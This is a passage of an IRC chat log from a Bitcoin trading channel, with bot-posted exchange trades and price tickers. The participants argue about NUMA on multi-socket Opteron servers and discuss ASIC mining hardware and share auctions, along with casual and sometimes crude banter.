and a single box is a NUMA box. Feb 07 22:15:06 midnightmagic: yes, but where would you find a machine that fits that description? Feb 07 22:15:07 [MPEX] [S.MPOE] 2750 @ 0.00068966 = 1.8966 BTC [+] Feb 07 22:15:20 and more importantly, who would buy it when they could buy functioning opteron and xeon boxes instead? Feb 07 22:15:29 Diablo-D3: They've been around for years. I have been personally benchmarking them for years. Feb 07 22:16:17 Admit that the PDF I linked is talking about a single box! Feb 07 22:16:23 because its not Feb 07 22:16:42 if it said 24 cores, you could possibly argue that if I didnt already know better Feb 07 22:17:21 the 12 core CPUs that the new 16 core bulldozers replace are actually MCM, complete with two memory controllers Feb 07 22:17:35 and an internal cross-socket bus Feb 07 22:18:06 so if opteron was actually numa like you thought it was, it'd look like that except 24 cores Feb 07 22:18:23 http://developer.amd.com/assets/LibNUMA-WP-fv1.pdf Feb 07 22:18:39 midnightmagic: yes, Ive played with libnuma before Feb 07 22:18:44 numactl and friends use it Feb 07 22:18:55 "INTRODUCTION TO NUMA" page 4. Feb 07 22:18:58 AMD manufactures very large numa machines Feb 07 22:19:05 like, half the top 500 are AMD NUMAs Feb 07 22:19:58 midnightmagic: anyhow, if numastat says you have multiple nodes, then either you're on numa or linux has a good reason for treating your box like numa Feb 07 22:20:11 Ive never seen a single opteron box ever say more than one node Feb 07 22:20:17 "One great advantage of the NUMA architecture is that even in a big system with many CPUs it is possible to get very low latency on the local memory." Feb 07 22:20:45 midnightmagic: yes, that statement does not conflict with anything I said Feb 07 22:20:50 numa doesnt effect local memory latency Feb 07 22:21:46 available: 4 nodes (0-3) Feb 07 22:21:49 :P Feb 07 22:22:17 That machine is like 6 years old. Feb 07 22:22:20 yes, I already pasted that in the other channel Feb 07 22:22:32 No that's the machine I'm currently logged into right now. Feb 07 22:22:40 weird, I wonder whats wrong with it Feb 07 22:22:49 how many sockets? Feb 07 22:24:12 It's an Opteron 854 based machine. Opteron 854s are single-core. You tell me how many sockets. Feb 07 22:25:16 huh, socket 940 Feb 07 22:25:53 midnightmagic: I think I know why it has numa enabled Feb 07 22:25:56 So for 6 years your definition has been wrong, at least. Feb 07 22:26:07 [MPEX] [S.MPOE] 1571 @ 0.00068966 = 1.0835 BTC [+] Feb 07 22:26:10 Grandpa. Feb 07 22:26:13 940 only had one htx bus Feb 07 22:26:20 so theres an htx bridge somewhere on your mobo Feb 07 22:26:29 ;;ticker Feb 07 22:26:30 BTCUSD ticker | Best bid: 22.00001, Best ask: 22.07497, Bid-ask spread: 0.07496, Last trade: 22.00001, 24 hour volume: 61920.41125063, 24 hour low: 20.77002, 24 hour high: 22.15000, 24 hour vwap: 21.51373 Feb 07 22:26:47 same reason I said some older 8 socket boards might appear as numa Feb 07 22:26:57 This is a 4-socket. Feb 07 22:26:58 not enough individual htx links Feb 07 22:27:42 they built two circular rings, then added two bridges where the crosses would go Feb 07 22:27:49 a fucking mutant of a machine Feb 07 22:28:11 Right, it's so alien, it's the ONE EXCEPTION to your definition. Feb 07 22:28:31 Woops, NUMA exists on multi-socket, single-box machines.. Feb 07 22:28:40 Definition fail. Feb 07 22:28:44 midnightmagic: not at all Feb 07 22:28:58 :P Why do you dislike moore? Feb 07 22:29:15 I dont, I just dont like people claiming anything with more than one socket is numa Feb 07 22:29:18 its just nonsensical Feb 07 22:29:39 Except that I have a machine that AMD calls NUMA that I'm logged into right now. Feb 07 22:29:41 and I believe I also said that opterons with htx bridges are numa Feb 07 22:29:54 yours has bridges. its numa. Feb 07 22:30:22 I'd hate to own that machine though Feb 07 22:30:47 you have to be very careful not to use anything that uses threads and/or isnt numa safe Feb 07 22:30:58 11:30 < moore> and when you have non uniforme access to memory like in a multi socket system it is nonuniform Feb 07 22:31:03 not only does that program slow down, but it assrapes the entire machine Feb 07 22:31:07 I'm fairly sure he's limited it to the definition of NUMA. Feb 07 22:31:17 midnightmagic: thats not the way I interpreted that Feb 07 22:31:32 The definition of NUMA is non-uniform, it's in the acronym. Feb 07 22:31:50 yes, but you and him were both claiming ANY non-local memory bank is non-uniform Feb 07 22:31:57 which its not Feb 07 22:32:56 midnightmagic: and btw, it works the other way Feb 07 22:33:03 I know you don't log, but even in your scrollback, I'm fairly sure you can't find a quote from me where I asserted that. Feb 07 22:33:09 opteron memory controllers talk to each other to synchronize various things Feb 07 22:33:19 they dont when they're on other sides of an htx bridge Feb 07 22:33:34 King of whargarble.. Feb 07 22:33:45 if amd ever fixed that, you might end up with a non-numa supercomputer. Feb 07 22:34:07 I'm fairly sure that speed of memory access is the only qualifier. Feb 07 22:34:29 yes, but I go by magnitudes Feb 07 22:34:31 Also AMD calls the machines NUMA. Feb 07 22:34:42 external htx buses are slow and high latency Feb 07 22:35:41 midnightmagic: btw, ONLY claiming non-locality of memory being slow means numa Feb 07 22:35:44 then what about GPUs? Feb 07 22:36:10 are they NUMA too? your definition seems to fit that even though its really wrong Feb 07 22:36:24 [MPEX] [S.MPOE] 4321 @ 0.00068243 = 2.9488 BTC [-] Feb 07 22:36:25 [MPEX] [S.MPOE] 4679 @ 0.00068218 = 3.1919 BTC [-] Feb 07 22:36:40 the majority of memory isnt local to compute units Feb 07 22:36:54 Yes, GPU memory is non-uniform also. Feb 07 22:37:06 its non-uniform, but is it numa? Feb 07 22:38:09 actually, I wonder if it does really qualify to be called that Feb 07 22:38:09 It is much slower for the CPU to access the memory of a GPU, and thus by definition it is also non-uniform memory access. Feb 07 22:38:16 http://www.youtube.com/watch?v=60og9gwKh1o <-diablo Feb 07 22:38:24 midnightmagic: Im talking just from the perspective of the gpu Feb 07 22:39:10 Taken as a unified whole, any processor "accessing" other memory, regardless of whether the system has to *push* memory out to a GPU and act as an interloper, means it is non-uniform memory access. Feb 07 22:39:20 intermediary even. Feb 07 22:39:35 yeah, but Im just talking the gpu accessing vram Feb 07 22:39:39 vram is non-local Feb 07 22:39:46 to the gpu itself Feb 07 22:40:04 compute units actually have local memory, and individual threads have local memory on top of that Feb 07 22:40:46 I don't know enough about that to meaningfully discuss it with you. Feb 07 22:40:58 heh Feb 07 22:41:02 So are you just trolling moore? Feb 07 22:41:12 no, I thought moore was trolling me Feb 07 22:41:12 a/are/were/ ? Feb 07 22:41:51 No, really. Did you just make all this up and then got surprised so you have to defend it by pretending "node" in the literature means something other than what it does? Feb 07 22:42:58 huh? the only thing you've done is found a box that qualifies to be called numa Feb 07 22:43:18 and due to how its constructed, yes, using it as numa is a better use of it's resources Feb 07 22:44:30 "its". Feb 07 22:44:54 midnightmagic: and btw, that 8 core box I described, Im pretty sure it had a northbridge for the second ring Feb 07 22:44:58 You guys should hang out, maybe go on a date Feb 07 22:44:59 ie, two northbridges in one box Feb 07 22:45:03 [MPEX] [S.DICE] 1200 @ 0.00619998 = 7.44 BTC [-] Feb 07 22:45:25 strange ass machine Feb 07 22:45:43 You mean super common amongst processors that have individual MM. Feb 07 22:46:03 midnightmagic: I said 2 not 8. Feb 07 22:46:10 "Super common machine." There.. FTFY. Feb 07 22:46:14 Bugpowder: they should take it to #bitcoin-bromance Feb 07 22:46:30 midnightmagic: its not common for machines to have more than one northbridge Feb 07 22:46:47 [MPEX] [S.MPOE] 4321 @ 0.0006896 = 2.9798 BTC [+] Feb 07 22:46:49 [MPEX] [S.MPOE] 13029 @ 0.00068979 = 8.9873 BTC [+] Feb 07 22:46:59 Ah, you're talking about your own machine, not the one I'm currently logged into right now. Feb 07 22:47:05 Intel is so much better than AMD Feb 07 22:47:10 I'm talking about the one I'm currently logged into. Feb 07 22:47:11 midnightmagic: Im talking in genral Feb 07 22:47:19 https://bitcointalk.org/index.php?topic=99497.msg1510110#msg1510110 Feb 07 22:47:22 midnightmagic: yours I wouldnt doubt it has a weird layout Feb 07 22:47:29 Now that's what I'm talking about Feb 07 22:47:34 midnightmagic: it probably has at least one htx bridge Feb 07 22:47:45 And.. almost every other machine that has a multi-socketed processor where each processor has a mm onboard and hands out memory to other processors over an interconnect. Feb 07 22:48:00 midnightmagic: I dont consider mm northbridges Feb 07 22:48:30 Pretty much every processor that can be used in a multi-socket machine now benefits from a NUMA-aware Linux. Feb 07 22:48:41 probably. Feb 07 22:48:53 dont get me wrong, I wish more shit was numa aware Feb 07 22:49:07 Namworld: yeah, I think thats awesome Feb 07 22:49:26 midnightmagic: as a programmer, Ive basically rejected threading altogether Feb 07 22:49:29 I think my ASICMINER shares will be sold =/ Feb 07 22:49:36 Namworld: why? Feb 07 22:49:48 Because they're already on auction Feb 07 22:49:52 heh Feb 07 22:49:59 what are you selling them for? Feb 07 22:50:02 and past their reserve price Feb 07 22:50:26 [BTCTC] [GSDPT] 3910 @ 0.0062 = 24.242 BTC [+] Feb 07 22:50:28 [BTCTC] [GSDPT] 16090 @ 0.0062 = 99.758 BTC [+] Feb 07 22:50:31 So when do consumer asicminer devices go on sale? Feb 07 22:50:39 midnightmagic: wont be with this batch Feb 07 22:50:48 Namworld: and where are you selling them? Feb 07 22:50:51 midnightmagic: avalon has sold 2 batches Feb 07 22:51:01 oh asicminer the brand Feb 07 22:51:03 sorry Feb 07 22:51:06 -_-` Feb 07 22:51:15 i thought you meant "consumer asic mining devices" Feb 07 22:51:27 on the forums Feb 07 22:51:55 midnightmagic: anyhow, whatever. if numactl says its numa, its probably numa, and I was tired of this argument long before gmaxwell freaked out Feb 07 22:52:13 If the others never ship, I'll be pissed. Feb 07 22:52:13 :P Feb 07 22:52:26 Namworld: bfl probably wont, and basic failed to ship Feb 07 22:52:44 If the others never ship, asicminer will have enough hash to 50%, and asic doomsday will happen. Feb 07 22:53:00 erm, you both do realize avalon shipped, right? Feb 07 22:53:17 Yeah Feb 07 22:53:19 Diablo-D3: I don't hear about anyone else receiving their units. Feb 07 22:53:25 2 out of 4 isnt bad when you realize how fucking scammy shit is Feb 07 22:53:29 [MPEX] [S.MPOE] 8650 @ 0.00068979 = 5.9667 BTC [+] Feb 07 22:53:37 Diablo-D3: Also, Yifu said the source would be published ages ago, but I don't see it. Feb 07 22:53:38 midnightmagic: dude, I really doubt they made 2 fully functioning machines like that Feb 07 22:53:48 i want an avalon Feb 07 22:53:52 the source for what, exactly? openwrt and cgminer? Feb 07 22:54:00 Diablo-D3: Yeah me too. And they're not fully functioning. Have you been seeing all the reboots Jeff's unit is doing? Feb 07 22:54:01 BFL might still save their face and just be really late incompetents. Feb 07 22:54:05 its not like he wrote any software Feb 07 22:54:15 Diablo-D3: Their changes to cgminer I'm personally most interested in. Feb 07 22:54:16 Otherwise, sucks for everyone. Feb 07 22:54:19 [MPEX] [S.MPOE] 4321 @ 0.00068253 = 2.9492 BTC [-] Feb 07 22:54:21 [MPEX] [S.MPOE] 8534 @ 0.00068218 = 5.8217 BTC [-] Feb 07 22:54:22 https://bitcointalk.org/index.php?topic=141067.msg1510245#msg1510245 Feb 07 22:54:30 Well the auction thread Feb 07 22:54:33 midnightmagic: I dont know why the reboots are happening Feb 07 22:54:39 I think they did the fault detection shit wrong Feb 07 22:54:46 instead of just handling it normally, they reboot the whole box Feb 07 22:55:13 0.35 price per share? huh Feb 07 22:55:21 you bought at .1? Feb 07 22:55:26 That is sweet Feb 07 22:55:28 Diablo-D3: I'm really hoping it's not that sensitive to heat. Because that would suck.. Feb 07 22:55:30 yeah Feb 07 22:55:37 midnightmagic: its not Feb 07 22:55:40 it is more money than you would make by holding the shares and recieving dividends Feb 07 22:55:51 Diablo-D3: Jeff said when he gets it cooled properly the reboots ease up. Feb 07 22:55:55 But looks like ASICMINER is deploying boards. Plus it's not like it's a fixed bond. Feb 07 22:56:01 AND you could then put the proceeds on NO on the BFL bitbet to increase it even more Feb 07 22:56:16 ;;calc 0.36 * 696 Feb 07 22:56:17 250.56 Feb 07 22:56:17 It's a long term profit share of an ASIC manufacturer Feb 07 22:56:22 meh Feb 07 22:56:32 250BTC aint bad Feb 07 22:56:39 I would take it and run Feb 07 22:56:46 Is asicminer listed on an exchange somewhere? Feb 07 22:56:50 NOP Feb 07 22:56:54 We're at day 3.5 of a 7 days auction. Feb 07 22:57:08 last ones went for 0.45 each Feb 07 22:57:14 was only 10 shares tho Feb 07 22:57:21 hrm Feb 07 22:57:26 ;;calc 0.35 * 696 Feb 07 22:57:27 243.6 Feb 07 22:57:57 If avalon really hasn't shipped Feb 07 22:58:12 Bugpowder: They said there were customs delays. Feb 07 22:58:17 These shares could make. 1BTC each Feb 07 22:58:26 I think that is the max upside Feb 07 22:58:35 Bugpowder: I think closer to 2 Feb 07 22:58:35 On the bright side, I heard back from them and they told me that Icarus owners get to jump the line. :) Feb 07 22:58:40 [MPEX] [S.MPOE] 3751 @ 0.00068219 = 2.5589 BTC [+] Feb 07 22:59:10 well, let the games begin I guess Feb 07 22:59:39 Although, the best use of fiat was to actually BUY bitcoins instead of mining equipment Feb 07 23:00:42 ;;calc 0.32 * 696 Feb 07 23:00:43 222.72 Feb 07 23:00:43 Bugpowder: From a purely economic sense. *Some* people just want to participate more as a miner, and get pristine coins. Feb 07 23:01:28 pigeons: Originally, 200+ share owners for asicminer were planned to be able to trade-in and get an asicminer. I don't know what's happening with that deal these days. Feb 07 23:01:38 yeah, mining is kinda fun Feb 07 23:01:56 until my apt smelled like hot PCBs Feb 07 23:02:46 Namworld: I made a bid Feb 07 23:03:51 another one I wonder about is deepbit reclaimer asics where you buy the shares at icbit.se Feb 07 23:04:10 that one is dead Feb 07 23:06:00 Namworld: hahahaha I made the list short Feb 07 23:06:04 You sure it's going to be rentable? Feb 07 23:06:34 you would have to assume asicminer got their boards hashing individually before racking them up Feb 07 23:07:09 If they stick around for at least a year mining and selling ASICs, I guess... more if they design new chips in the future. Feb 07 23:07:26 I guess the competition will be an important impact Feb 07 23:08:49 [MPEX] [S.MPOE] 4321 @ 0.0006876 = 2.9711 BTC [+] Feb 07 23:08:50 [MPEX] [S.MPOE] 455 @ 0.00068753 = 0.3128 BTC [-] Feb 07 23:09:01 I am torn right now, by my will to secure a profit right away and how good ASICMINER seems to be turning out. Feb 07 23:09:33 somebody said that once you have a design applying it to 'smaller process' is easier? Feb 07 23:09:41 dub: yes Feb 07 23:19:38 [HAVELOCK] [SDICE] 2 @ 0.63999999 = 1.28 BTC [+] Feb 07 23:23:31 [MPEX] [S.MPOE] 4321 @ 0.00068953 = 2.9795 BTC [+] Feb 07 23:23:33 [MPEX] [S.MPOE] 1779 @ 0.00068978 = 1.2271 BTC [+] Feb 07 23:25:07 https://bitcointalk.org/index.php?topic=99497.msg1510794#msg1510794 why the fuck would you mock up at least 4 subracks? Feb 07 23:26:27 gah its the forum. Feb 07 23:27:14 dub: I like to think of them as ghetto bladeboxes Feb 07 23:30:41 theres plenty of telco kit in that type of configuration, ISDN muxes etc Feb 07 23:32:06 I thought that kind of gear was horizontal? Feb 07 23:34:20 pigeons: Reclaimer, at least in the broken google translation from Russian, was going to be extremely technically complex to configure. Much more raw than the other polished devices coming online. Feb 07 23:34:26 not by convention that I am aware, most of what I've seen has vertical cards Feb 07 23:38:41 pigeons: Tycho is taking refund requests now from reclaimer orders.. Feb 07 23:42:20 [MPEX] [S.MPOE] 2900 @ 0.000688 = 1.9952 BTC [-] Feb 07 23:42:21 [MPEX] [S.MPOE] 570 @ 0.00068775 = 0.392 BTC [-] Feb 07 23:42:23 [MPEX] [S.MPOE] 14695 @ 0.00068753 = 10.1033 BTC [-] Feb 07 23:42:24 [MPEX] [S.MPOE] 4933 @ 0.00068522 = 3.3802 BTC [-] Feb 07 23:42:26 [MPEX] [S.MPOE] 7055 @ 0.00068218 = 4.8128 BTC [-] Feb 07 23:47:22 loving this relentless buying pressure Feb 07 23:47:24 22.21 Feb 07 23:47:54 ;;ticker Feb 07 23:47:55 BTCUSD ticker | Best bid: 22.18000, Best ask: 22.20810, Bid-ask spread: 0.02810, Last trade: 22.20810, 24 hour volume: 62600.03776828, 24 hour low: 20.77002, 24 hour high: 22.20810, 24 hour vwap: 21.55024 Feb 07 23:48:37 [MPEX] [S.MPOE] 4321 @ 0.00068959 = 2.9797 BTC [+] Feb 07 23:48:39 [MPEX] [S.MPOE] 2679 @ 0.00068978 = 1.8479 BTC [+] Feb 07 23:50:05 But will it last is the question Feb 07 23:50:42 hope not Feb 07 23:51:22 Namworld: have you worked out how transfering your asicminer shares is gogin to work? Feb 07 23:51:32 might be tempted to sell mine around that rte Feb 07 23:51:39 rate* Feb 07 23:51:58 ASICMINER plans to make an exclusive platform to transfer shares. Feb 07 23:52:19 If it's not done before dividends coming in, I plan to just forward them. Feb 07 23:52:24 yeah but in the interim, or are you holding on behalf until then? Feb 07 23:52:27 ah Feb 07 23:52:29 yes Feb 07 23:52:38 I guess there's no other options Feb 07 23:53:03 Unless friedcat is willing to make it personally and verify a signed statement from me Feb 07 23:53:07 [MPEX] [S.MPOE] 4321 @ 0.00068238 = 2.9486 BTC [-] Feb 07 23:53:09 [MPEX] [S.MPOE] 679 @ 0.00068218 = 0.4632 BTC [-] Feb 07 23:55:40 thought he was Feb 07 23:58:03 [MPEX] [S.MPOE] 2600 @ 0.0006897 = 1.7932 BTC [+] Feb 08 00:01:23 [BTCTC] [RSM] 75 @ 0.0099 = 0.7425 BTC [-] Feb 08 00:01:56 Ah, I was not sure Feb 08 00:02:06 His thread is huge, might have missed it. Feb 08 00:03:03 [MPEX] [S.MPOE] 1721 @ 0.0006897 = 1.187 BTC [+] Feb 08 00:03:05 [MPEX] [S.MPOE] 5542 @ 0.00068978 = 3.8228 BTC [+] Feb 08 00:03:07 [MPEX] [S.MPOE] 3837 @ 0.00068979 = 2.6467 BTC [+] Feb 08 00:05:16 [MPEX] [S.DICE] 1196 @ 0.00619998 = 7.4152 BTC [-] Feb 08 00:07:28 ;;ticker Feb 08 00:07:30 BTCUSD ticker | Best bid: 22.02102, Best ask: 22.19800, Bid-ask spread: 0.17698, Last trade: 22.02102, 24 hour volume: 63404.43122740, 24 hour low: 20.77002, 24 hour high: 22.21999, 24 hour vwap: 21.57193 Feb 08 00:07:42 new high? Feb 08 00:08:03 Well Feb 08 00:08:09 If you plot the monthly Feb 08 00:08:25 it has been climbing linearly $0.35 day for 23 days Feb 08 00:08:36 Projecting to Opex Feb 08 00:08:58 ;;calc 22.20+.25*14 Feb 08 00:08:58 25.7 Feb 08 00:09:02 ;;calc 22.20+.35*14 Feb 08 00:09:03 27.1 Feb 08 00:09:28 A boy can dream Feb 08 00:09:54 TESLA Feb 08 00:11:36 [MPEX] [S.MPOE] 4321 @ 0.00068383 = 2.9548 BTC [-] Feb 08 00:11:38 [MPEX] [S.MPOE] 15813 @ 0.0006835 = 10.8082 BTC [-] Feb 08 00:11:41 [MPEX] [S.MPOE] 6348 @ 0.00068218 = 4.3305 BTC [-] Feb 08 00:11:50 [MPEX] [S.MPOE] 9534 @ 0.00067904 = 6.474 BTC [-] Feb 08 00:11:51 [MPEX] [S.MPOE] 6354 @ 0.00067903 = 4.3146 BTC [-] Feb 08 00:16:57 [MPEX] [S.MPOE] 4321 @ 0.00067914 = 2.9346 BTC [+] Feb 08 00:16:59 [MPEX] [S.MPOE] 4079 @ 0.00067904 = 2.7698 BTC [-] Feb 08 00:35:39 [HAVELOCK] [SDICE] 7 @ 0.63999999 = 4.48 BTC [+] Feb 08 00:41:26 What an idiot. http://docpad.evbogue.com/posts/coinbase Feb 08 00:46:28 super cool dude with 42bucks. Feb 08 00:48:05 o hey 22 huh Feb 08 00:49:06 probably has mental health issues Feb 08 00:49:09 [MPEX] [S.MPOE] 1540 @ 0.00067904 = 1.0457 BTC [-] Feb 08 00:54:49 [BTCTC] [GSDPT] 225 @ 0.0062 = 1.395 BTC [+] Feb 08 00:54:50 hey bugpoweder Feb 08 00:54:59 earlier you said dice is in trouble. what do yo umean by that Feb 08 00:55:38 http://polimedia.us/dtng/c/src/136025259648.jpg 0,0 Feb 08 00:56:16 wtf Feb 08 00:56:47 ikr? Feb 08 00:57:14 ummmm Feb 08 00:57:19 thug life. Feb 08 00:57:26 mp is that you? Feb 08 00:57:34 no, i think it's some forum dude Feb 08 00:57:50 apparently mpoe-pr offered some dood 10 btc for sharpie in pooper pic ?! Feb 08 00:58:20 i have a db of ass pics Feb 08 00:58:25 lemme see if I can match it up Feb 08 00:58:32 I learned to not click dtng links Feb 08 00:58:33 go right ahead Feb 08 00:58:56 by now i'm kinda scared to step away Feb 08 00:59:15 im gone for half a day, you never know what i find when i'm back Feb 08 00:59:37 what happened? Feb 08 00:59:53 i know that feeling but today seems pretty uneventful Feb 08 01:00:17 and s.dice tranche got postponed too Feb 08 01:00:21 NEW DRAMA: nothing happend. Feb 08 01:00:35 [BTCTC] [B.YABMC] 14 @ 0.0231 = 0.3234 BTC [-] Feb 08 01:01:40 fuu- Feb 08 01:01:54 the drama to end all drama Feb 08 01:02:13 so if the tranch is delayed then the 30 day rule kicks in? Feb 08 01:02:30 no ? Feb 08 01:02:31 I feel we got saturated a bit, no one is eating dat wall Feb 08 01:03:38 a, well, prolly have to wait a bit yeah Feb 08 01:03:59 tho was like 250k earlier, now i see liek 130 Feb 08 01:05:22 no Feb 08 01:05:38 I think its different oreders Feb 08 01:05:44 the 250k got pulled Feb 08 01:05:54 but it might have come back as a split Feb 08 01:06:17 but didn't look like it given how they appeared Feb 08 01:06:29 and thier 1 satoshi difference pricing Feb 08 01:07:55 a Feb 08 01:09:11 !ticker m S.DICE Feb 08 01:09:12 [MPEX:S.DICE] 1D: 0.00590933 / 0.00619936 / 0.0064 (500087 shares, 3,100.22 BTC), 7D: 0.0042 / 0.00578926 / 0.007395 (3563078 shares, 20,627.61 BTC), 30D: 0.00085848 / 0.00533866 / 0.0075 (8223498 shares, 43,902.48 BTC) Feb 08 01:14:30 [MPEX] [S.DICE] 300 @ 0.00619998 = 1.86 BTC [-] Feb 08 01:15:06 [MPEX] [S.DICE] 3087 @ 0.00619998 = 19.1393 BTC [-] Feb 08 01:18:51 [MPEX] [S.MPOE] 1962 @ 0.00067931 = 1.3328 BTC [+] Feb 08 01:18:53 [MPEX] [S.MPOE] 9838 @ 0.00067903 = 6.6803 BTC [-] Feb 08 01:21:07 [MPEX] [S.MPOE] 4 @ 0.00068978 = 0.0028 BTC [+] Feb 08 01:26:06 hey mp, erik said the other tranches are postponed or canned indefinately Feb 08 01:26:14 so the 30 day rule applies now? Feb 08 01:26:43 what do you mean applies now ? Feb 08 01:26:53 the 30 day rule applies to the original ipo described in the contract Feb 08 01:26:58 after that the owner does w/e he wants Feb 08 01:27:44 [MPEX] [S.MPOE] 1500 @ 0.00068978 = 1.0347 BTC [+] Feb 08 01:28:26 oh Feb 08 01:28:27 kk Feb 08 01:28:27 what mircea said Feb 08 01:29:14 !ticker b bitvps Feb 08 01:29:14 These beans is shit. Feb 08 01:32:05 [MPEX] [S.MPOE] 12250 @ 0.00067903 = 8.3181 BTC [-] Feb 08 01:32:56 !ticker bc bitvps Feb 08 01:32:56 I don't know those people, and they don't look very friendly. Feb 08 01:33:08 !ticker btct bitvps Feb 08 01:33:10 [BTCT:BITVPS] 1D: -- / -- / -- (0 shares, 0 BTC), 7D: -- / 0.0 / -- (0 shares, 0 BTC), 30D: -- / 0.0 / -- (0 shares, 0 BTC) Feb 08 01:33:29 It's not trading yet Feb 08 01:34:25 ;;ticker Feb 08 01:34:26 BTCUSD ticker | Best bid: 22.00002, Best ask: 22.10000, Bid-ask spread: 0.09998, Last trade: 22.10000, 24 hour volume: 63605.98111189, 24 hour low: 20.77002, 24 hour high: 22.21999, 24 hour vwap: 21.59327 Feb 08 01:34:29 so asicminer has asics? Feb 08 01:34:41 or "comming soon" Feb 08 01:34:50 Network total 26.884 Thash/s Feb 08 01:34:54 in a word, no. Feb 08 01:35:04 ok so there is only avalons Feb 08 01:35:11 still only 2 avalons? Feb 08 01:35:22 well it was 22.xx TH Feb 08 01:35:25 now 26 Feb 08 01:35:26 it would seem some chinese people got some boxes too Feb 08 01:35:33 damn chinese people Feb 08 01:35:45 Bowjob it varies 22-33 with the luck variance Feb 08 01:36:00 yeah there isn't any difference between 22 and 26 Feb 08 01:36:09 you cant know Feb 08 01:36:35 [MPEX] [S.MPOE] 2817 @ 0.00068978 = 1.9431 BTC [+] Feb 08 01:36:37 [MPEX] [S.MPOE] 4583 @ 0.00068978 = 3.1613 BTC [+] Feb 08 01:36:44 and when does avalon sell more units? Feb 08 01:37:25 http://bitcoin.sipa.be/speed-small-lin.png Feb 08 01:37:38 You can see the drop after reward halving for december Feb 08 01:37:50 and now it's climbing up just as fast Feb 08 01:38:56 hot wallet stolen? just do an IPO: https://cryptostocks.com/securities/34 Feb 08 01:39:22 yeah that's a "nice" valuation there Feb 08 01:41:18 i thought this was the bitfloor Feb 08 01:41:21 how silly of me Feb 08 01:41:30 it's YET ANOTHER different one. Feb 08 01:42:04 maybe you remember me raving how ugly their website was Feb 08 01:42:13 that was before mpex Feb 08 01:42:46 oh i didn't meant it that way, sry Feb 08 01:43:51 mpex isn't ugly Feb 08 01:43:55 it's just differently beautiful Feb 08 01:44:02 its dog Feb 08 01:44:12 dog-gone pretty. Feb 08 01:47:05 http://www.youtube.com/watch?v=ed3VprSRe5c Feb 08 01:47:07 this is kinda funny. Feb 08 01:50:08 [MPEX] [S.MPOE] 4321 @ 0.00068944 = 2.9791 BTC [-] Feb 08 01:50:14 [MPEX] [S.MPOE] 5417 @ 0.00068978 = 3.7365 BTC [+] Feb 08 01:50:17 [MPEX] [S.MPOE] 2962 @ 0.00068979 = 2.0432 BTC [+] Feb 08 02:02:35 [MPEX] [S.MPOE] 3950 @ 0.0006791 = 2.6824 BTC [-] Feb 08 02:03:03 !ticker m s.mpoe Feb 08 02:03:04 [MPEX:S.MPOE] 1D: 0.00067854 / 0.00069172 / 0.0007 (3255366 shares, 2,251.80 BTC), 7D: 0.00064676 / 0.00068225 / 0.0007 (17909130 shares, 12,218.56 BTC), 30D: 0.00059445 / 0.00066424 / 0.0007 (61845920 shares, 41,080.77 BTC) Feb 08 02:04:03 !ticker btct s.dice-pt Feb 08 02:04:05 [BTCT:S.DICE-PT] 1D: 0.0061 / 0.0062 / 0.0062 (330 shares, 2.0 BTC), 7D: 0.0061 / 0.01 / 0.0062 (4600 shares, 28.5 BTC), 30D: 0.0061 / 0.01 / 0.0062 (4600 shares, 28.5 BTC) Feb 08 02:09:50 [MPEX] [S.MPOE] 371 @ 0.0006791 = 0.2519 BTC [-] Feb 08 02:09:52 [MPEX] [S.MPOE] 4321 @ 0.00067904 = 2.9341 BTC [-] Feb 08 02:09:54 [MPEX] [S.MPOE] 5240 @ 0.00067903 = 3.5581 BTC [-] Feb 08 02:19:44 ;;ticker Feb 08 02:19:45 BTCUSD ticker | Best bid: 22.11001, Best ask: 22.18999, Bid-ask spread: 0.07998, Last trade: 22.18999, 24 hour volume: 63835.22357796, 24 hour low: 20.77002, 24 hour high: 22.21999, 24 hour vwap: 21.61214 Feb 08 02:20:00 it's stabilizing at 22? Feb 08 02:21:43 doubt it Feb 08 02:22:36 I've priced my S.DICE pass-through at 0.0059 if that interests anyone. Feb 08 02:22:38 if its 22 more than 5min its stable. Feb 08 02:23:09 lol, it's like 3hrs Feb 08 02:23:28 sheesh, time to move already Feb 08 02:23:43 it does this move-and-rest thing Feb 08 02:23:50 moves in a day, waits for a coupla, moves again Feb 08 02:25:37 lol libertards dreaming of stealing mpex hotwallet: http://www.reddit.com/r/Libertarian/comments/182v6v/as_international_currency_war_brews_bitcoin_may/c8b833u Feb 08 02:26:11 Isn't it an offline wallet... Feb 08 02:26:42 well why ruin their fun. Feb 08 02:26:59 i'm sure they can do anything. Feb 08 02:27:23 MP gonna close mpex and point to that thread as culprit Feb 08 02:27:36 http://www.youtube.com/watch?v=gSjLiQxEZlM Feb 08 02:28:00 jurov lol they seriously don't see that angle, i'm sure. I could just go "sorry, X redditor stole all the moneyz. Bye" Feb 08 02:30:47 Do they plan to pay for whole airplane tickets to Romania? A classic crowbar and american fist kind of "hacking"? Feb 08 02:30:49 http://xkcd.com/538/ Feb 08 02:31:42 maybe they get free sex reassignment surgery with that trip. Feb 08 02:38:28 [MPEX] [S.MPOE] 4321 @ 0.00068206 = 2.9472 BTC [+] Feb 08 02:38:30 [MPEX] [S.MPOE] 2094 @ 0.00068224 = 1.4286 BTC [+] Feb 08 02:42:39 [HAVELOCK] [SDICE] 17 @ 0.63999999 = 10.88 BTC [+] Feb 08 02:49:57 [MPEX] [S.MPOE] 4321 @ 0.00068209 = 2.9473 BTC [-] Feb 08 02:49:59 [MPEX] [S.MPOE] 10137 @ 0.00068224 = 6.9159 BTC [+] Feb 08 02:50:01 [MPEX] [S.MPOE] 7321 @ 0.00068908 = 5.0448 BTC [+] Feb 08 02:52:01 upup Feb 08 02:52:40 [HAVELOCK] [KCIM] 1 @ 0.93 BTC [+] Feb 08 02:53:12 ? Feb 08 02:53:39 [HAVELOCK] [KCIM] 10 @ 0.925 = 9.25 BTC [-] Feb 08 02:54:39 [HAVELOCK] [HIM] 1 @ 12.122 BTC [+] Feb 08 02:55:41 [HAVELOCK] [HIM] 1 @ 12.12 BTC [-] Feb 08 02:59:38 stable at 22??? Feb 08 02:59:42 i think not Feb 08 03:01:06 ;;ticker Feb 08 03:01:07 BTCUSD ticker | Best bid: 22.26826, Best ask: 22.35500, Bid-ask spread: 0.08674, Last trade: 22.35500, 24 hour volume: 61512.56044097, 24 hour low: 20.87000, 24 hour high: 22.35500, 24 hour vwap: 21.67908 Feb 08 03:05:04 22.40 Feb 08 03:05:24 ;;asks 25 Feb 08 03:05:26 There are currently 18351.727 bitcoins offered at or under 25.0 USD, worth 432045.110806 USD in total. Feb 08 03:05:48 ;;bids 20 Feb 08 03:05:50 There are currently 30640.908 bitcoins demanded at or over 20.0 USD, worth 641566.791021 USD in total. Feb 08 03:07:17 [MPEX] [S.MPOE] 4321 @ 0.00067907 = 2.9343 BTC 